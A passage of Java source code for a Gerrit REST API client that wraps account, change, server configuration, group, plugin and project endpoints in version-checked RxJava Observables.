Observable<AccountInfo> createAccount( @NonNull String username, @NonNull AccountInput input) { return withVersionRequestCheck(mService.createAccount(username, input)); } @Override public Observable<AccountDetailInfo> getAccountDetails(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountDetails(accountId)); } @Override public Observable<String> getAccountName(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountName(accountId)); } @Override public Observable<String> setAccountName( @NonNull String accountId, @NonNull AccountNameInput input) { return withVersionRequestCheck(mService.setAccountName(accountId, input)); } @Override public Observable<Void> deleteAccountName(@NonNull String accountId) { return withVersionRequestCheck(mService.deleteAccountName(accountId)); } @Override public Observable<String> getAccountUsername(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountUsername(accountId)); } @Override public Observable<String> setAccountUsername( @NonNull String accountId, @NonNull UsernameInput input) { return withVersionRequestCheck(mService.setAccountUsername(accountId, input)); } @Override public Observable<String> isAccountActive(@NonNull String accountId) { return withVersionRequestCheck(mService.isAccountActive(accountId)); } @Override public Observable<Void> setAccountAsActive(@NonNull String accountId) { return withVersionRequestCheck(mService.setAccountAsActive(accountId)); } @Override public Observable<Void> setAccountAsInactive(@NonNull String accountId) { return withVersionRequestCheck(mService.setAccountAsInactive(accountId)); } @Override public Observable<String> getHttpPassword(@NonNull String accountId) { return withVersionRequestCheck(mService.getHttpPassword(accountId)); } @Override public Observable<String> setHttpPassword( @NonNull String accountId, @NonNull HttpPasswordInput input) { return withVersionRequestCheck(mService.setHttpPassword(accountId, input)); } @Override public Observable<Void> deleteHttpPassword(@NonNull String accountId) { return withVersionRequestCheck(mService.deleteHttpPassword(accountId)); } @Override public Observable<OAuthTokenInfo> getOAuthToken(@NonNull String accountId) { return withVersionRequestCheck(mService.getOAuthToken(accountId)); } @Override public Observable<List<EmailInfo>> getAccountEmails(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountEmails(accountId)); } @Override public Observable<EmailInfo> getAccountEmail( @NonNull String accountId, @NonNull String emailId) { return withVersionRequestCheck(mService.getAccountEmail(accountId, emailId)); } @Override public Observable<EmailInfo> createAccountEmail(@NonNull String accountId, @NonNull String emailId, @NonNull EmailInput input) { return withVersionRequestCheck(mService.createAccountEmail(accountId, emailId, input)); } @Override public Observable<Void> deleteAccountEmail(@NonNull String accountId, @NonNull String emailId) { return withVersionRequestCheck(mService.deleteAccountEmail(accountId, emailId)); } @Override public Observable<Void> setAccountPreferredEmail( @NonNull String accountId, @NonNull String emailId) { return withVersionRequestCheck(mService.setAccountPreferredEmail(accountId, emailId)); } @Override public Observable<List<SshKeyInfo>> getAccountSshKeys(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountSshKeys(accountId)); } @Override public Observable<SshKeyInfo> getAccountSshKey(@NonNull String accountId, int sshKeyId) { return withVersionRequestCheck(mService.getAccountSshKey(accountId, sshKeyId)); } @Override public Observable<SshKeyInfo> addAccountSshKey( @NonNull String accountId, @NonNull String encodedKey) { return withVersionRequestCheck(mService.addAccountSshKey(accountId, encodedKey)); } @Override public Observable<Void> deleteAccountSshKey(@NonNull String accountId, int sshKeyId) { return withVersionRequestCheck(mService.deleteAccountSshKey(accountId, sshKeyId)); } @Override public Observable<List<GpgKeyInfo>> getAccountGpgKeys(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountGpgKeys(accountId)); } @Override public Observable<GpgKeyInfo> getAccountGpgKey( @NonNull String accountId, @NonNull String gpgKeyId) { return withVersionRequestCheck(mService.getAccountGpgKey(accountId, gpgKeyId)); } @Override public Observable<Map<String, GpgKeyInfo>> addAccountGpgKeys( @NonNull String accountId, @NonNull AddGpgKeyInput input) { return withVersionRequestCheck(mService.addAccountGpgKeys(accountId, input)); } @Override public Observable<Map<String, GpgKeyInfo>> deleteAccountGpgKeys( @NonNull String accountId, @NonNull DeleteGpgKeyInput input) { return withVersionRequestCheck(mService.deleteAccountGpgKeys(accountId, input)); } @Override public Observable<AccountCapabilityInfo> getAccountCapabilities( @NonNull String accountId, @Nullable List<Capability> filter) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getAccountCapabilities(accountId, filterByVersion(filter)) .toBlocking().first())); } @Override public Observable<String> hasAccountCapability( @NonNull String accountId, @NonNull Capability capabilityId) { return withVersionRequestCheck(mService.hasAccountCapability(accountId, capabilityId)); } @Override public Observable<List<GroupInfo>> getAccountGroups(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountGroups(accountId)); } @Override public Observable<ResponseBody> getAccountAvatar( @NonNull String accountId, @Nullable Integer size) { return withVersionRequestCheck(mService.getAccountAvatar(accountId, size)); } @Override public Observable<String> getAccountAvatarChangeUrl(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountAvatarChangeUrl(accountId)); } @Override public Observable<PreferencesInfo> getAccountPreferences(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountPreferences(accountId)); } @Override public Observable<PreferencesInfo> setAccountPreferences( @NonNull String accountId, @NonNull PreferencesInput input) { return withVersionRequestCheck(mService.setAccountPreferences(accountId, input)); } @Override public Observable<DiffPreferencesInfo> getAccountDiffPreferences(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountDiffPreferences(accountId)); } @Override public Observable<DiffPreferencesInfo> setAccountDiffPreferences( @NonNull String accountId, @NonNull DiffPreferencesInput input) { return withVersionRequestCheck(mService.setAccountDiffPreferences(accountId, input)); } @Override public Observable<EditPreferencesInfo> getAccountEditPreferences(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountEditPreferences(accountId)); } @Override public Observable<EditPreferencesInfo> setAccountEditPreferences( @NonNull String accountId, @NonNull EditPreferencesInput input) { return withVersionRequestCheck(mService.setAccountEditPreferences(accountId, input)); } @Override public Observable<List<ProjectWatchInfo>> getAccountWatchedProjects(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountWatchedProjects(accountId)); } @Override public Observable<List<ProjectWatchInfo>> addOrUpdateAccountWatchedProjects( @NonNull String accountId, @NonNull List<ProjectWatchInput> input) { return withVersionRequestCheck(mService.addOrUpdateAccountWatchedProjects(accountId, input)); } @Override public Observable<Void> deleteAccountWatchedProjects( @NonNull String accountId, @NonNull List<DeleteProjectWatchInput> input) { return withVersionRequestCheck(mService.deleteAccountWatchedProjects(accountId, input)); } @Override public Observable<List<ChangeInfo>> getDefaultStarredChanges(@NonNull String accountId) { return withVersionRequestCheck(mService.getDefaultStarredChanges(accountId)); } @Override public Observable<Void> putDefaultStarOnChange( @NonNull String accountId, @NonNull String changeId) { return withVersionRequestCheck(mService.putDefaultStarOnChange(accountId, changeId)); } @Override public Observable<Void> deleteDefaultStarFromChange( @NonNull String accountId, @NonNull String changeId) { return withVersionRequestCheck(mService.deleteDefaultStarFromChange(accountId, changeId)); } @Override public Observable<List<ChangeInfo>> getStarredChanges(@NonNull String accountId) { return withVersionRequestCheck(mService.getStarredChanges(accountId)); } @Override public Observable<List<String>> getStarLabelsFromChange( @NonNull String accountId, @NonNull String changeId) { return withVersionRequestCheck(mService.getStarLabelsFromChange(accountId, changeId)); } @Override public Observable<List<String>> updateStarLabelsFromChange(@NonNull String accountId, @NonNull String changeId, @NonNull StarInput input) { return withVersionRequestCheck(mService.updateStarLabelsFromChange(accountId, changeId, input)); } @Override public Observable<List<ContributorAgreementInfo>> getContributorAgreements( @NonNull String accountId) { return withVersionRequestCheck(mService.getContributorAgreements(accountId)); } @Override public Observable<String> signContributorAgreement( @NonNull String accountId, @NonNull ContributorAgreementInput input) { return withVersionRequestCheck(mService.signContributorAgreement(accountId, input)); } // =============================== // Gerrit changes endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-changes.html" // =============================== @Override public Observable<ChangeInfo> createChange(@NonNull ChangeInput input) { return withVersionRequestCheck(mService.createChange(input)); } @Override public Observable<List<ChangeInfo>> getChanges( @NonNull ChangeQuery query, @Nullable Integer count, @Nullable Integer start, @Nullable List<ChangeOptions> options) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getChanges(query, count, start, filterByVersion(options)) .toBlocking().first())); } @Override public Observable<ChangeInfo> getChange( @NonNull String changeId, @Nullable List<ChangeOptions> options) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getChange(changeId, filterByVersion(options)) .toBlocking().first())); } @Override public Observable<ChangeInfo> getChangeDetail( @NonNull String changeId, @Nullable List<ChangeOptions> options) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getChangeDetail(changeId, filterByVersion(options)) .toBlocking().first())); } @Override public Observable<String> getChangeTopic(@NonNull String changeId) { return withVersionRequestCheck(mService.getChangeTopic(changeId)); } @Override public Observable<String> setChangeTopic(@NonNull String changeId, @NonNull TopicInput input) { return withVersionRequestCheck(mService.setChangeTopic(changeId, input)); } @Override public Observable<Void> deleteChangeTopic(@NonNull String changeId) { return withVersionRequestCheck(mService.deleteChangeTopic(changeId)); } @Override public Observable<ChangeInfo> abandonChange( @NonNull String changeId, @NonNull AbandonInput input) { return withVersionRequestCheck(mService.abandonChange(changeId, input)); } @Override public Observable<ChangeInfo> restoreChange( @NonNull String changeId, @NonNull RestoreInput input) { return withVersionRequestCheck(mService.restoreChange(changeId, input)); } @Override public Observable<ChangeInfo> rebaseChange( @NonNull String changeId, @Nullable RebaseInput input) { return withVersionRequestCheck(mService.rebaseChange(changeId, input)); } @Override public Observable<ChangeInfo> moveChange( @NonNull String changeId, @NonNull MoveInput input) { return withVersionRequestCheck(mService.moveChange(changeId, input)); } @Override public Observable<ChangeInfo> revertChange( @NonNull String changeId, @NonNull RevertInput input) { return withVersionRequestCheck(mService.revertChange(changeId, input)); } @Override public Observable<ChangeInfo> submitChange( @NonNull String changeId, @NonNull SubmitInput input) { return withVersionRequestCheck(mService.submitChange(changeId, input)); } @Override public Observable<List<ChangeInfo>> getChangesSubmittedTogether( @NonNull String changeId, @Nullable List<SubmittedTogetherOptions> options) { return withVersionRequestCheck(mService.getChangesSubmittedTogether(changeId, options)); } @Override public Observable<Void> publishDraftChange(@NonNull String changeId) { return withVersionRequestCheck(mService.publishDraftChange(changeId)); } @Override public Observable<Void> deleteDraftChange(@NonNull String changeId) { return withVersionRequestCheck(mService.deleteDraftChange(changeId)); } @Override public Observable<IncludeInInfo> getChangeIncludedIn(@NonNull String changeId) { return withVersionRequestCheck(mService.getChangeIncludedIn(changeId)); } @Override public Observable<Void> indexChange(@NonNull String changeId) { return withVersionRequestCheck(mService.indexChange(changeId)); } @Override public Observable<Map<String, List<CommentInfo>>> getChangeComments(@NonNull String changeId) { return withVersionRequestCheck(mService.getChangeComments(changeId)); } @Override public Observable<Map<String, List<CommentInfo>>> getChangeDraftComments( @NonNull String changeId) { return withVersionRequestCheck(mService.getChangeDraftComments(changeId)); } @Override public Observable<ChangeInfo> checkChange(@NonNull String changeId) { return withVersionRequestCheck(mService.checkChange(changeId)); } @Override public Observable<ChangeInfo> fixChange(@NonNull String changeId, @NonNull FixInput input) { return withVersionRequestCheck(mService.fixChange(changeId, input)); } @Override public Observable<EditInfo> getChangeEdit(@NonNull String changeId, @Nullable Option list, @Nullable String base, @Nullable Option downloadCommands) { return withVersionRequestCheck(mService.getChangeEdit( changeId, list, base, downloadCommands)); } @Override public Observable<Void> setChangeEdit( @NonNull String changeId, @NonNull String fileId, @NonNull RequestBody data) { return withVersionRequestCheck(mService.setChangeEdit(changeId, fileId, data)); } @Override public Observable<Void> restoreChangeEdit( @NonNull String changeId, @NonNull RestoreChangeEditInput input) { return withVersionRequestCheck(mService.restoreChangeEdit(changeId, input)); } @Override public Observable<Void> renameChangeEdit( @NonNull String changeId, @NonNull RenameChangeEditInput input) { return withVersionRequestCheck(mService.renameChangeEdit(changeId, input)); } @Override public Observable<Void> newChangeEdit( @NonNull String changeId, @NonNull NewChangeEditInput input) { return withVersionRequestCheck(mService.newChangeEdit(changeId, input)); } @Override public Observable<Void> deleteChangeEditFile(@NonNull String changeId, @NonNull String fileId) { return withVersionRequestCheck(mService.deleteChangeEditFile(changeId, fileId)); } @Override public Observable<Base64Data> getChangeEditFileContent( @NonNull String changeId, @NonNull String fileId, @Nullable String base) { return withVersionRequestCheck(mService.getChangeEditFileContent(changeId, fileId, base)); } @Override public Observable<EditFileInfo> getChangeEditFileMetadata( @NonNull String changeId, @NonNull String fileId) { return withVersionRequestCheck(mService.getChangeEditFileMetadata(changeId, fileId)); } @Override public Observable<String> getChangeEditMessage(@NonNull String changeId) { return withVersionRequestCheck(mService.getChangeEditMessage(changeId)); } @Override public Observable<Void> setChangeEditMessage( @NonNull String changeId, @NonNull ChangeEditMessageInput input) { return withVersionRequestCheck(mService.setChangeEditMessage(changeId, input)); } @Override public Observable<Void> publishChangeEdit(@NonNull String changeId) { return withVersionRequestCheck(mService.publishChangeEdit(changeId)); } @Override public Observable<Void> rebaseChangeEdit(@NonNull String changeId) { return withVersionRequestCheck(mService.rebaseChangeEdit(changeId)); } @Override public Observable<Void> deleteChangeEdit(@NonNull String changeId) { return withVersionRequestCheck(mService.deleteChangeEdit(changeId)); } @Override public Observable<List<ReviewerInfo>> getChangeReviewers(@NonNull String changeId) { return withVersionRequestCheck(mService.getChangeReviewers(changeId)); } @Override public Observable<List<SuggestedReviewerInfo>> getChangeSuggestedReviewers( @NonNull String changeId, @NonNull String query, @Nullable Integer count) { return withVersionRequestCheck( mService.getChangeSuggestedReviewers(changeId, query, count)); } @Override public Observable<List<ReviewerInfo>> getChangeReviewer( @NonNull String changeId, @NonNull String accountId) { return withVersionRequestCheck(mService.getChangeReviewer(changeId, accountId)); } @Override public Observable<AddReviewerResultInfo> addChangeReviewer( @NonNull String changeId, @NonNull ReviewerInput input) { return withVersionRequestCheck(mService.addChangeReviewer(changeId, input)); } @Override public Observable<Void> deleteChangeReviewer( @NonNull String changeId, @NonNull String accountId) { return withVersionRequestCheck(mService.deleteChangeReviewer(changeId, accountId)); } @Override public Observable<Map<String, Integer>> getChangeReviewerVotes( @NonNull String changeId, @NonNull String accountId) { return withVersionRequestCheck(mService.getChangeReviewerVotes(changeId, accountId)); } @Override public Observable<Void> deleteChangeReviewerVote(@NonNull String changeId, @NonNull String accountId, @NonNull String labelId, @NonNull DeleteVoteInput input) { return withVersionRequestCheck( mService.deleteChangeReviewerVote(changeId, accountId, labelId, input)); } @Override public Observable<CommitInfo> getChangeRevisionCommit( @NonNull String changeId, @NonNull String revisionId, @Nullable Option links) { return withVersionRequestCheck( mService.getChangeRevisionCommit(changeId, revisionId, links)); } @Override public Observable<Map<String, ActionInfo>> getChangeRevisionActions( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.getChangeRevisionActions(changeId, revisionId)); } @Override public Observable<ChangeInfo> getChangeRevisionReview( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.getChangeRevisionReview(changeId, revisionId)); } @Override public Observable<ReviewInfo> setChangeRevisionReview(@NonNull String changeId, @NonNull String revisionId, @NonNull ReviewInput input) { return withVersionRequestCheck( mService.setChangeRevisionReview(changeId, revisionId, input)); } @Override public Observable<RelatedChangesInfo> getChangeRevisionRelatedChanges( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck( mService.getChangeRevisionRelatedChanges(changeId, revisionId)); } @Override public Observable<ChangeInfo> rebaseChangeRevision( @NonNull String changeId, @NonNull String revisionId, @NonNull RebaseInput input) { return withVersionRequestCheck(mService.rebaseChangeRevision(changeId, revisionId, input)); } @Override public Observable<SubmitInfo> submitChangeRevision( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.submitChangeRevision(changeId, revisionId)); } @Override public Observable<SubmitInfo> publishChangeDraftRevision( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.publishChangeDraftRevision(changeId, revisionId)); } @Override public Observable<SubmitInfo> deleteChangeDraftRevision( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.deleteChangeDraftRevision(changeId, revisionId)); } @Override public Observable<Base64Data> getChangeRevisionPatch(@NonNull String changeId, @NonNull String revisionId, @Nullable Option zip, @Nullable Option download) { return withVersionRequestCheck( mService.getChangeRevisionPatch(changeId, revisionId, zip, download)); } @Override public Observable<MergeableInfo> getChangeRevisionMergeableStatus(@NonNull String changeId, @NonNull String revisionId, @Nullable Option otherBranches) { return withVersionRequestCheck( mService.getChangeRevisionMergeableStatus(changeId, revisionId, otherBranches)); } @Override public Observable<SubmitType> getChangeRevisionSubmitType( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.getChangeRevisionSubmitType(changeId, revisionId)); } @Override public Observable<SubmitType> testChangeRevisionSubmitType(@NonNull String changeId, @NonNull String revisionId, @NonNull RuleInput input) { return withVersionRequestCheck( mService.testChangeRevisionSubmitType(changeId, revisionId, input)); } @Override public Observable<List<SubmitRecordInfo>> testChangeRevisionSubmitRule( @NonNull String changeId, @NonNull String revisionId, @NonNull RuleInput input) { return withVersionRequestCheck( mService.testChangeRevisionSubmitRule(changeId, revisionId, input)); } @Override public Observable<Map<String, List<CommentInfo>>> getChangeRevisionDrafts( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck( mService.getChangeRevisionDrafts(changeId, revisionId)); } @Override public Observable<CommentInfo> createChangeRevisionDraft( @NonNull String changeId, @NonNull String revisionId, @NonNull CommentInput input) { return withVersionRequestCheck( mService.createChangeRevisionDraft(changeId, revisionId, input)); } @Override public Observable<CommentInfo> getChangeRevisionDraft( @NonNull String changeId, @NonNull String revisionId, @NonNull String draftId) { return withVersionRequestCheck( mService.getChangeRevisionDraft(changeId, revisionId, draftId)); } @Override public Observable<CommentInfo> updateChangeRevisionDraft(@NonNull String changeId, @NonNull String revisionId, @NonNull String draftId, @NonNull CommentInput input) { return withVersionRequestCheck( mService.updateChangeRevisionDraft(changeId, revisionId, draftId, input)); } @Override public Observable<Void> deleteChangeRevisionDraft( @NonNull String changeId, @NonNull String revisionId, @NonNull String draftId) { return withVersionRequestCheck( mService.deleteChangeRevisionDraft(changeId, revisionId, draftId)); } @Override public Observable<Map<String, List<CommentInfo>>> getChangeRevisionComments( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.getChangeRevisionComments(changeId, revisionId)); } @Override public Observable<CommentInfo> getChangeRevisionComment(@NonNull String changeId, @NonNull String revisionId, @NonNull String commentId) { return withVersionRequestCheck( mService.getChangeRevisionComment(changeId, revisionId, commentId)); } @Override public Observable<Map<String, FileInfo>> getChangeRevisionFiles( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.getChangeRevisionFiles(changeId, revisionId)); } @Override public Observable<ResponseBody> getChangeRevisionFileContent(@NonNull String changeId, @NonNull String revisionId, @NonNull String fileId) { return withVersionRequestCheck( mService.getChangeRevisionFileContent(changeId, revisionId, fileId)); } @Override public Observable<ResponseBody> getChangeRevisionFileDownload(@NonNull String changeId, @NonNull String revisionId, @NonNull String fileId, @Nullable SuffixMode suffixMode, @Nullable Integer parent) { return withVersionRequestCheck(mService.getChangeRevisionFileDownload( changeId, revisionId, fileId, suffixMode, parent)); } @Override public Observable<DiffInfo> getChangeRevisionFileDiff(@NonNull String changeId, @NonNull String revisionId, @NonNull String fileId, @Nullable Integer base, @Nullable Option intraline, @Nullable Option weblinksOnly, @Nullable WhitespaceType whitespace, @Nullable IgnoreWhitespaceType ignoreWhitespace, @Nullable ContextType context) { return withVersionRequestCheck(mService.getChangeRevisionFileDiff(changeId, revisionId, fileId, base, intraline, weblinksOnly, mMediator.resolveWhiteSpaceType(whitespace), mMediator.resolveIgnoreWhiteSpaceType(ignoreWhitespace), context)); } @Override public Observable<BlameInfo> getChangeRevisionFileBlame(@NonNull String changeId, @NonNull String revisionId, @NonNull String fileId, @Nullable String base) { return withVersionRequestCheck( mService.getChangeRevisionFileBlame(changeId, revisionId, fileId, base)); } @Override public Observable<Void> setChangeRevisionFileAsReviewed( @NonNull String changeId, @NonNull String revisionId, @NonNull String fileId) { return withVersionRequestCheck( mService.setChangeRevisionFileAsReviewed(changeId, revisionId, fileId)); } @Override public Observable<Void> setChangeRevisionFileAsNotReviewed( @NonNull String changeId, @NonNull String revisionId, @NonNull String fileId) { return withVersionRequestCheck( mService.setChangeRevisionFileAsNotReviewed(changeId, revisionId, fileId)); } @Override public Observable<ChangeInfo> cherryPickChangeRevision(@NonNull String changeId, @NonNull String revisionId, @NonNull CherryPickInput input) { return withVersionRequestCheck( mService.cherryPickChangeRevision(changeId, revisionId, input)); } // =============================== // Gerrit configuration endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-config.html" // =============================== @Override public Observable<ServerVersion> getServerVersion() { return andCacheVersion(mService.getServerVersion()); } @Override public Observable<ServerInfo> getServerInfo() { return withVersionRequestCheck(mService.getServerInfo()); } @Override public Observable<Void> confirmEmail(@NonNull EmailConfirmationInput input) { return withVersionRequestCheck(mService.confirmEmail(input)); } @Override public Observable<Map<String, CacheInfo>> getServerCaches() { return withVersionRequestCheck(mService.getServerCaches()); } @Override public Observable<Void> executeServerCachesOperations(CacheOperationInput input) { return withVersionRequestCheck(mService.executeServerCachesOperations(input)); } @Override public Observable<CacheInfo> getServerCache(@NonNull String cacheId) { return withVersionRequestCheck(mService.getServerCache(cacheId)); } @Override public Observable<Void> flushServerCache(@NonNull String cacheId) { return withVersionRequestCheck(mService.flushServerCache(cacheId)); } @Override public Observable<SummaryInfo> getServerSummary(@Nullable Option jvm, @Nullable Option gc) { return withVersionRequestCheck(mService.getServerSummary(jvm, gc)); } @Override public Observable<Map<Capability, ServerCapabilityInfo>> getServerCapabilities() { return withVersionRequestCheck(mService.getServerCapabilities()); } @Override public Observable<List<TaskInfo>> getServerTasks() { return withVersionRequestCheck(mService.getServerTasks()); } @Override public Observable<TaskInfo> getServerTask(@NonNull String taskId) { return withVersionRequestCheck(mService.getServerTask(taskId)); } @Override public Observable<Void> deleteServerTask(@NonNull String taskId) { return withVersionRequestCheck(mService.deleteServerTask(taskId)); } @Override public Observable<List<TopMenuEntryInfo>> getServerTopMenus() { return withVersionRequestCheck(mService.getServerTopMenus()); } @Override public Observable<PreferencesInfo> getServerDefaultPreferences() { return withVersionRequestCheck(mService.getServerDefaultPreferences()); } @Override public Observable<PreferencesInfo> setServerDefaultPreferences( @NonNull PreferencesInput input) { return withVersionRequestCheck(mService.setServerDefaultPreferences(input)); } @Override public Observable<DiffPreferencesInfo> getServerDefaultDiffPreferences() { return withVersionRequestCheck(mService.getServerDefaultDiffPreferences()); } @Override public Observable<DiffPreferencesInfo> setServerDefaultDiffPreferences( @NonNull DiffPreferencesInput input) { return withVersionRequestCheck(mService.setServerDefaultDiffPreferences(input)); } // =============================== // Gerrit groups endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-groups.html" // =============================== @Override public Observable<List<GroupInfo>> getGroupSuggestions( @NonNull String query, @Nullable Integer count) { return withVersionRequestCheck(mService.getGroupSuggestions(query, count)); } @Override public Observable<List<GroupInfo>> getGroups( @Nullable GroupQuery query, @Nullable Integer count, @Nullable Integer start, @Nullable String project, @Nullable String user, @Nullable Option owned, @Nullable Option visibleToAll, @Nullable Option verbose, @Nullable List<GroupOptions> options) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getGroups(query, count, start, project, user, owned, visibleToAll, verbose, filterByVersion(options)) .toBlocking().first())); } @Override public Observable<GroupInfo> getGroup(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroup(groupId)); } @Override public Observable<GroupInfo> createGroup(@NonNull String groupName, @NonNull GroupInput input) { return withVersionRequestCheck(mService.createGroup(groupName, input)); } @Override public Observable<GroupInfo> getGroupDetail(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupDetail(groupId)); } @Override public Observable<String> getGroupName(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupName(groupId)); } @Override public Observable<String> setGroupName(@NonNull String groupId, @NonNull GroupNameInput input) { return withVersionRequestCheck(mService.setGroupName(groupId, input)); } @Override public Observable<String> getGroupDescription(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupDescription(groupId)); } @Override public Observable<String> setGroupDescription( @NonNull String groupId, @NonNull GroupDescriptionInput input) { return withVersionRequestCheck(mService.setGroupDescription(groupId, input)); } @Override public Observable<Void> deleteGroupDescription(@NonNull String groupId) { return withVersionRequestCheck(mService.deleteGroupDescription(groupId)); } @Override public Observable<GroupOptionsInfo> getGroupOptions(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupOptions(groupId)); } @Override public Observable<GroupOptionsInfo> setGroupOptions( @NonNull String groupId, @NonNull GroupOptionsInput input) { return withVersionRequestCheck(mService.setGroupOptions(groupId, input)); } @Override public Observable<GroupInfo> getGroupOwner(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupOwner(groupId)); } @Override public Observable<GroupInfo> setGroupOwner( @NonNull String groupId, @NonNull GroupOwnerInput input) { return withVersionRequestCheck(mService.setGroupOwner(groupId, input)); } @Override public Observable<List<GroupAuditEventInfo>> getGroupAuditLog(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupAuditLog(groupId)); } @Override public Observable<List<AccountInfo>> getGroupMembers( @NonNull String groupId, @Nullable Option recursive) { return withVersionRequestCheck(mService.getGroupMembers(groupId, recursive)); } @Override public Observable<AccountInfo> getGroupMember( @NonNull String groupId, @NonNull String accountId) { return withVersionRequestCheck(mService.getGroupMember(groupId, accountId)); } @Override public Observable<AccountInfo> addGroupMember( @NonNull String groupId, @NonNull String accountId) { return withVersionRequestCheck(mService.addGroupMember(groupId, accountId)); } @Override public Observable<List<AccountInfo>> addGroupMembers( @NonNull String groupId, @NonNull MemberInput input) { return withVersionRequestCheck(mService.addGroupMembers(groupId, input)); } @Override public Observable<Void> deleteGroupMember(@NonNull String groupId, @NonNull String accountId) { return withVersionRequestCheck(mService.deleteGroupMember(groupId, accountId)); } @Override public Observable<Void> deleteGroupMembers( @NonNull String groupId, @NonNull MemberInput input) { return withVersionRequestCheck(mService.deleteGroupMembers(groupId, input)); } @Override public Observable<List<GroupInfo>> getGroupIncludedGroups(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupIncludedGroups(groupId)); } @Override public Observable<GroupInfo> getGroupIncludedGroup( @NonNull String groupId, @NonNull String includedGroupId) { return withVersionRequestCheck(mService.getGroupIncludedGroup(groupId, includedGroupId)); } @Override public Observable<GroupInfo> addGroupIncludeGroup( @NonNull String groupId, @NonNull String includedGroupId) { return withVersionRequestCheck(mService.addGroupIncludeGroup(groupId, includedGroupId)); } @Override public Observable<GroupInfo> addGroupIncludeGroups( @NonNull String groupId, @NonNull IncludeGroupInput input) { return withVersionRequestCheck(mService.addGroupIncludeGroups(groupId, input)); } @Override public Observable<Void> deleteGroupIncludeGroup( @NonNull String groupId, @NonNull String includedGroupId) { return withVersionRequestCheck(mService.deleteGroupIncludeGroup(groupId, includedGroupId)); } @Override public Observable<Void> deleteGroupIncludeGroup( @NonNull String groupId, @NonNull IncludeGroupInput input) { return withVersionRequestCheck(mService.deleteGroupIncludeGroup(groupId, input)); } // =============================== // Gerrit plugins endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-plugins.html" // =============================== @Override public Observable<Map<String, PluginInfo>> getPlugins() { return withVersionRequestCheck(mService.getPlugins()); } @Override public Observable<PluginInfo> installPlugin( @NonNull String pluginId, @NonNull PluginInput input) { return withVersionRequestCheck(mService.installPlugin(pluginId, input)); } @Override public Observable<PluginInfo> getPluginStatus(@NonNull String pluginId) { return withVersionRequestCheck(mService.getPluginStatus(pluginId)); } @Override public Observable<PluginInfo> enablePlugin(@NonNull String pluginId) { return withVersionRequestCheck(mService.enablePlugin(pluginId)); } @Override public Observable<PluginInfo> disablePlugin(@NonNull String pluginId) { return withVersionRequestCheck(mService.disablePlugin(pluginId)); } @Override public Observable<PluginInfo> reloadPlugin(@NonNull String pluginId) { return withVersionRequestCheck(mService.reloadPlugin(pluginId)); } // =============================== // Gerrit projects endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-projects.html" // =============================== @Override public Observable<Map<String, ProjectInfo>> getProjects(@Nullable Option showDescription, @Nullable Option showTree, @Nullable String branch, @Nullable ProjectType type, @Nullable String group) { return withVersionRequestCheck( mService.getProjects(showDescription, showTree, branch, type, group)); } @Override public Observable<ProjectInfo> getProject(@NonNull String projectName) { return withVersionRequestCheck(mService.getProject(projectName)); } @Override public Observable<ProjectInfo> createProject( @NonNull String projectName, @NonNull ProjectInput input) { return withVersionRequestCheck(mService.createProject(projectName, input)); } @Override public Observable<String> getProjectDescription(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectDescription(projectName)); } @Override public Observable<String> setProjectDescription( @NonNull String projectName, @NonNull ProjectDescriptionInput input) { return withVersionRequestCheck(mService.setProjectDescription(projectName, input)); } @Override public Observable<Void> deleteProjectDescription(@NonNull String projectName) { return withVersionRequestCheck(mService.deleteProjectDescription(projectName)); } @Override public Observable<String> getProjectParent(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectParent(projectName)); } @Override public Observable<String> setProjectParent( @NonNull String projectName, @NonNull ProjectParentInput input) { return withVersionRequestCheck(mService.setProjectParent(projectName, input)); } @Override public Observable<String> getProjectHead(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectHead(projectName)); } @Override public Observable<String> setProjectHead( @NonNull String projectName, @NonNull HeadInput input) { return withVersionRequestCheck(mService.setProjectHead(projectName, input)); } @Override public Observable<RepositoryStatisticsInfo> getProjectStatistics(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectStatistics(projectName)); } @Override public Observable<ConfigInfo> getProjectConfig(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectConfig(projectName)); } @Override public Observable<ConfigInfo> setProjectConfig( @NonNull String projectName, @NonNull ConfigInput input) { return 